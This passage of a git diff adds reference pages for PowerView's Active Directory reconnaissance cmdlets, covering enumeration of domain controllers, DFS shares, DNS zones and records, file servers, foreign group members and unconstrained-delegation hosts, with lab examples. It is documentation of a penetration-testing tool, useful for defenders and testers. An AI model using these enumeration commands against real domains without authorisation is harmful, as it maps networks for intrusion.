+``` + +### -Unconstrained +Switch. +Return computer objects that have unconstrained delegation. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -TrustedToAuth +Switch. +Return computer objects that are trusted to authenticate for other principals. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Printers +Switch. +Return only printers. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SPN +Return computers with a specific service principal name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePrincipalName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OperatingSystem +Return computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServicePack +Return computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SiteName +Return computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Ping +Switch. +Ping each host to ensure it's up before enumerating. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.Computer + +Custom PSObject with translated computer property fields. + +PowerView.Computer.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainController.md b/docs/Recon/Get-DomainController.md new file mode 100755 index 0000000..3d15f5c --- /dev/null +++ b/docs/Recon/Get-DomainController.md @@ -0,0 +1,132 @@ +# Get-DomainController + +## SYNOPSIS +Return the domain controllers for the current (or specified) domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-Domain + +## SYNTAX + +``` +Get-DomainController [[-Domain] ] [-Server ] [-LDAP] [-Credential ] +``` + +## DESCRIPTION +Enumerates the domain controllers for the current or specified domain. +By default built in .NET methods are used. +The -LDAP switch uses Get-DomainComputer +to search for domain controllers. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainController -Domain 'test.local' +``` + +Determine the domain controllers for 'test.local'. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainController -Domain 'test.local' -LDAP +``` + +Determine the domain controllers for 'test.local' using LDAP queries. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +'test.local' | Get-DomainController +``` + +Determine the domain controllers for 'test.local'. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainController -Credential $Cred + +## PARAMETERS + +### -Domain +The domain to query for domain controllers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAP +Switch. +Use LDAP queries to determine the domain controllers instead of built in .NET methods. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.Computer + +Outputs custom PSObjects with details about the enumerated domain controller if -LDAP is specified. + +System.DirectoryServices.ActiveDirectory.DomainController + +If -LDAP isn't specified. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainDFSShare.md b/docs/Recon/Get-DomainDFSShare.md new file mode 100755 index 0000000..ce33275 --- /dev/null +++ b/docs/Recon/Get-DomainDFSShare.md @@ -0,0 +1,202 @@ +# Get-DomainDFSShare + +## SYNOPSIS +Returns a list of all fault-tolerant distributed file systems +for the current (or specified) domain. + +Author: Ben Campbell (@meatballs__) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher + +## SYNTAX + +``` +Get-DomainDFSShare [[-Domain] ] [[-SearchBase] ] [[-Server] ] + [[-SearchScope] ] [[-ResultPageSize] ] [[-ServerTimeLimit] ] [-Tombstone] + [[-Credential] ] [[-Version] ] +``` + +## DESCRIPTION +This function searches for all distributed file systems (either version +1, 2, or both depending on -Version X) by searching for domain objects +matching (objectClass=fTDfs) or (objectClass=msDFS-Linkv2), respectively +The server data is parsed appropriately and returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainDFSShare +``` + +Returns all distributed file system shares for the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainDFSShare -Domain testlab.local +``` + +Returns all distributed file system shares for the 'testlab.local' domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainDFSShare -Credential $Cred + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DomainName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 7 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Version +{{Fill Version Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 8 +Default value: All +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.Management.Automation.PSCustomObject + +A custom PSObject describing the distributed file systems. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainDNSRecord.md b/docs/Recon/Get-DomainDNSRecord.md new file mode 100755 index 0000000..e444fd5 --- /dev/null +++ b/docs/Recon/Get-DomainDNSRecord.md @@ -0,0 +1,181 @@ +# Get-DomainDNSRecord + +## SYNOPSIS +Enumerates the Active Directory DNS records for a given zone. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-DNSRecord + +## SYNTAX + +``` +Get-DomainDNSRecord [-ZoneName] [-Domain ] [-Server ] [-Properties ] + [-ResultPageSize ] [-ServerTimeLimit ] [-FindOne] [-Credential ] +``` + +## DESCRIPTION +Given a specific Active Directory DNS zone name, query for all 'dnsNode' +LDAP entries using that zone as the search base. +Return all DNS entry results +and use Convert-DNSRecord to try to convert the binary DNS record blobs. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainDNSRecord -ZoneName testlab.local +``` + +Retrieve all records for the testlab.local zone. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainDNSZone | Get-DomainDNSRecord +``` + +Retrieve all records for all zones in the current domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainDNSZone -Domain dev.testlab.local | Get-DomainDNSRecord -Domain dev.testlab.local +``` + +Retrieve all records for all zones in the dev.testlab.local domain. + +## PARAMETERS + +### -ZoneName +Specifies the zone to query for records (which can be enumearted with Get-DomainDNSZone). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +The domain to query for zones, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to for the search. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Name,distinguishedname,dnsrecord,whencreated,whenchanged +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.DNSRecord + +Outputs custom PSObjects with detailed information about the DNS record entry. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainDNSZone.md b/docs/Recon/Get-DomainDNSZone.md new file mode 100755 index 0000000..7065b26 --- /dev/null +++ b/docs/Recon/Get-DomainDNSZone.md @@ -0,0 +1,156 @@ +# Get-DomainDNSZone + +## SYNOPSIS +Enumerates the Active Directory DNS zones for a given domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainDNSZone [[-Domain] ] [-Server ] [-Properties ] [-ResultPageSize ] + [-ServerTimeLimit ] [-FindOne] [-Credential ] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainDNSZone +``` + +Retrieves the DNS zones for the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainDNSZone -Domain dev.testlab.local -Server primary.testlab.local +``` + +Retrieves the DNS zones for the dev.testlab.local domain, binding to primary.testlab.local. + +## PARAMETERS + +### -Domain +The domain to query for zones, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to for the search. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.DNSZone + +Outputs custom PSObjects with detailed information about the DNS zone. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainFileServer.md b/docs/Recon/Get-DomainFileServer.md new file mode 100755 index 0000000..34e9f00 --- /dev/null +++ b/docs/Recon/Get-DomainFileServer.md @@ -0,0 +1,200 @@ +# Get-DomainFileServer + +## SYNOPSIS +Returns a list of servers likely functioning as file servers. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher + +## SYNTAX + +``` +Get-DomainFileServer [[-Domain] ] [[-LDAPFilter] ] [[-SearchBase] ] + [[-Server] ] [[-SearchScope] ] [[-ResultPageSize] ] [[-ServerTimeLimit] ] + [-Tombstone] [[-Credential] ] +``` + +## DESCRIPTION +Returns a list of likely fileservers by searching for all users in Active Directory +with non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying +the server names. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainFileServer +``` + +Returns active file servers for the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainFileServer -Domain testing.local +``` + +Returns active file servers for the 'testing.local' domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainFileServer -Credential $Cred + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DomainName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 4 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 7 +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 8 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### String + +One or more strings representing file server names. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainForeignGroupMember.md b/docs/Recon/Get-DomainForeignGroupMember.md new file mode 100755 index 0000000..9061774 --- /dev/null +++ b/docs/Recon/Get-DomainForeignGroupMember.md @@ -0,0 +1,238 @@ +# Get-DomainForeignGroupMember + +## SYNOPSIS +Enumerates groups with users outside of the group's domain and returns +each foreign member. +This is a domain's "incoming" access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainGroup + +## SYNTAX + +``` +Get-DomainForeignGroupMember [[-Domain] ] [-LDAPFilter ] [-Properties ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +Uses Get-DomainGroup to enumerate all groups for the current (or target) domain, +then enumerates the members of each group, and compares the member's domain +name to the parent group's domain name, outputting the member if the domains differ. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainForeignGroupMember +``` + +Return all group members in the current domain where the group and member differ. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainForeignGroupMember -Domain dev.testlab.local +``` + +Return all group members in the dev.testlab.local domain where the member is not in dev.testlab.local. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainForeignGroupMember -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred + +Return all group members in the dev.testlab.local domain where the member is +not in dev.testlab.local. +binding to the secondary.dev.testlab.local for +queries, and using the specified alternate credentials. + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ForeignGroupMember + +Custom PSObject with translated group member property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainForeignUser.md b/docs/Recon/Get-DomainForeignUser.md new file mode 100755 index 0000000..85b0092 --- /dev/null +++ b/docs/Recon/Get-DomainForeignUser.md @@ -0,0 +1,239 @@ +# Get-DomainForeignUser + +## SYNOPSIS +Enumerates users who are in groups outside of the user's domain. +This is a domain's "outgoing" access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainUser + +## SYNTAX + +``` +Get-DomainForeignUser [[-Domain] ] [-LDAPFilter ] [-Properties ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +Uses Get-DomainUser to enumerate all users for the current (or target) domain, +then calculates the given user's domain name based on the user's distinguishedName. +This domain name is compared to the queried domain, and the user object is +output if they differ. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainForeignUser +``` + +Return all users in the current domain who are in groups not in the +current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainForeignUser -Domain dev.testlab.local +``` + +Return all users in the dev.testlab.local domain who are in groups not in the +dev.testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred + +Return all users in the dev.testlab.local domain who are in groups not in the +dev.testlab.local domain, binding to the secondary.dev.testlab.local for queries, and +using the specified alternate credentials. + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential 